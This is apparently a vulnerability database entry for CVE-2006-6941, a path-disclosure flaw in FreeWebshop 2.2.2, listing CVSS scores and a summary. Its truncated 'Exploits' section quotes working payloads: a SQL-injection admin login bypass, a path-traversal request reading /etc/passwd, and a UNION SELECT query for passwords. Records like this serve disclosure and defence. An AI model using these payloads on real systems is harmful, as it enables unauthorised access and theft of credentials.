5
CVSSv2

CVE-2006-6941

Published: 19/01/2007 Updated: 19/10/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

index.php in FreeWebshop 2.2.2 and previous versions allows remote malicious users to obtain sensitive information via an invalid action parameter in an info operation, which discloses the path in an error message.

Vulnerable Product Search on Vulmon Subscribe to Product

freewebshop freewebshop

Exploits

Product: wwwfreewebshoporg Version: 22x, maybe lower Critical Lvl : Highly critical Where : From Remote Exploits: Bypass Login: username:admin password:' or 'a'='a Read Files: /indexphp?page=info&action=////////////etc/passwd%00 List Passwords: /indexphp?page=details&prod=1%20UNION%20SELECT%201,password,3,lo ...